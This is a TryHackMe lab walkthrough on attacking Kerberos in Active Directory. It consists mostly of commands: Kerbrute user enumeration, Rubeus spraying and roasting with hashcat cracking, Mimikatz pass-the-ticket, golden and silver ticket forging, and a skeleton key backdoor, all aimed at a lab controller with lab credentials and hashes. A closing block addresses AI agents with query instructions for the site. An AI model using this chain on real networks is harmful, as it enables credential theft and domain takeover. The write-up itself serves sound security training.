# Attacking Kerberos **Room Link:** ## Presteps for Lab ### Kerbrute Installation Download a precompiled binary for your OS - ``` wget https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_linux_amd64 -O kerbrute && chmod +x kerbrute ``` ### Impacket Installation ``` wget https://github.com/fortra/impacket/archive/refs/tags/impacket_0_9_19.tar.gz tar xvf impacket_0_9_19.tar.gz cd /root/impacket-impacket_0_9_19 pip install . ``` ### Download wordlists ``` wget https://raw.githubusercontent.com/Cryilllic/Active-Directory-Wordlists/master/User.txt wget https://raw.githubusercontent.com/Cryilllic/Active-Directory-Wordlists/master/Pass.txt ``` ### Add hostname to host file ``` echo $VICTIM CONTROLLER.local >> /etc/hosts cat /etc/hosts ```

## Enumeration w/ Kerbrute This will brute force user accounts from a domain controller using a supplied wordlist ``` ./kerbrute userenum --dc CONTROLLER.local -d CONTROLLER.local User.txt ```

## Harvesting & Brute-Forcing Tickets w/ Rubeus Login with provided credentials **Kali** ``` ssh Administrator@$VICTIM Password: P@$$W0rd ``` Harvest tickets with Rubeus **Victim** ``` cd Downloads Rubeus.exe harvest /interval:30 ```

This will take a given password and "spray" it against all found users then give the .kirbi TGT for that user **Victim** ``` echo $VICTIM CONTROLLER.local >> C:\Windows\System32\drivers\etc\hosts cd Downloads Rubeus.exe brute /password:Password1 /noticket ```

## Kerberoasting w/ Rubeus & Impacket ### Kerberoasting #1 - Rubeus This will dump the Kerberos hash of any kerberoastable users. **Victim** ``` cd Downloads Rubeus.exe kerberoast ```

Copy the hashes from the command prompt onto the attacker machine and put it into a .txt file so we can crack it with hashcat. Below command removes all the tabs and formats it properly for hashcat. If you don't format it properly than hashcat will error out. **Kali** ``` cat hashes.txt | sed 's/[[:space:]]//g' |tr -d '\n' | sed 's/$krb5tgs$23$*/\n&/g' > hash.txt hashcat -m 13100 -a 0 hash.txt Pass.txt ``` Hashcat found the passwords for both of the hashes. ``` hashcat -m 13100 -a 0 hash.txt Pass.txt --show ```

### Kerberoasting #2 - Impacket ``` sudo python3.9 /root/test/impacket/examples/GetUserSPNs.py controller.local/Machine1:Password1 -dc-ip 10.10.226.108 -request > hashes.txt ```

Hashes were found for the same two accounts when doing this with Rubeus. ``` hashcat -m 13100 -a 0 hashes.txt Pass.txt hashcat -m 13100 -a 0 hashes.txt Pass.txt --show ```

## AS-REP Roasting w/ Rubeus **Victim** ``` cd Downloads Rubeus.exe asreproast ```

**Kali** Transfer the hash from the target machine over to kali and put the hash into a txt file. Insert 23$ after $krb5asrep$ so that the first line will be $krb5asrep$23$User... .The below command does the replace and clean up the output so hashcat can recognize the hashes. ``` cat hashes.txt | sed 's/[[:space:]]//g' |tr -d '\n'| sed 's/$krb5asrep/\n&/g' | sed 's/$krb5asrep/$krb5asrep$23/g' > hash.txt hashcat -m 18200 hash.txt Pass.txt ``` Both passwords cracked. ``` hashcat -m 18200 hash.txt Pass.txt --show ```

## Pass the Ticket w/ mimikatz ### Prepare Mimikatz & Dump Tickets **Victim** ``` cd Downloads mimikatz.exe ``` **Victim - Mimikatz** ``` privilege::debug sekurlsa::tickets /export ```

### Pass the Ticket w/ Mimikatz Run this command inside of mimikatz with the ticket that you harvested from earlier. It will cache and impersonate the given ticket **Victim - Mimikatz** ``` kerberos::ptt [0;2b4efc]-2-0-40e10000-Administrator@krbtgt-CONTROLLER.LOCAL.kirbi ```

Here were just verifying that we successfully impersonated the ticket by listing our cached ticket. **Victim** ``` klist ```

You now have impersonated the ticket giving you the same rights as the TGT you're impersonating. To verify this we can look at the admin share. **Victim** ``` dir \\$VICTIM\admin$ ```

## Golden/Silver Ticket Attacks w/ mimikatz **Victim** ``` cd downloads && mimikatz.exe ``` This will dump the hash as well as the security identifier needed to create a Golden Ticket. To create a silver ticket you need to change the /name: to dump the hash of either a domain admin account or a service account such as the SQLService account. **Victim - Mimikatz** ``` privilege::debug lsadump::lsa /inject /name:krbtgt ```

### Create a Golden/Silver Ticket A golden ticket attack works by dumping the ticket-granting ticket of any user on the domain this would preferably be a domain admin however for a golden ticket you would dump the krbtgt ticket and for a silver ticket, you would dump any service or domain admin ticket. This will provide you with the service/domain admin account's SID or security identifier that is a unique identifier for each user account, as well as the NTLM hash. You then use these details inside of a mimikatz golden ticket attack in order to create a TGT that impersonates the given service account information. #### Golden Ticket This is the command for creating a golden ticket. **Victim - Mimikatz** ``` Kerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-21-432953485-3795405108-1502158860 /krbtgt:72cd714611b64cd4d5550cd2759db3f6 ``` #### **Silver Ticket** This is the command for creating a golden ticket as well but to create a silver ticket simply put a service NTLM hash into the krbtgt slot, the sid of the service account into **sid**, and change the id to 1103. **Victim - Mimikatz** ``` Kerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-21-432953485-3795405108-1502158860 /krbtgt:72cd714611b64cd4d5550cd2759db3f6 /id:1103 ``` ### Use the Golden/Silver Ticket to access other machines ``` misc::cmd ``` NTLM hash of Administrator ``` lsadump::lsa /inject /name:Administrator ```

NTLM hash of SQLService ``` lsadump::lsa /inject /name:SQLService ```

## Kerberos Backdoors w/ mimikatz **Victim** ``` cd Downloads && mimikatz.exe ``` **Victim - Mimikatz** ``` privilege::debug misc::skeleton ```

**Victim** --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/attacking-kerberos.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.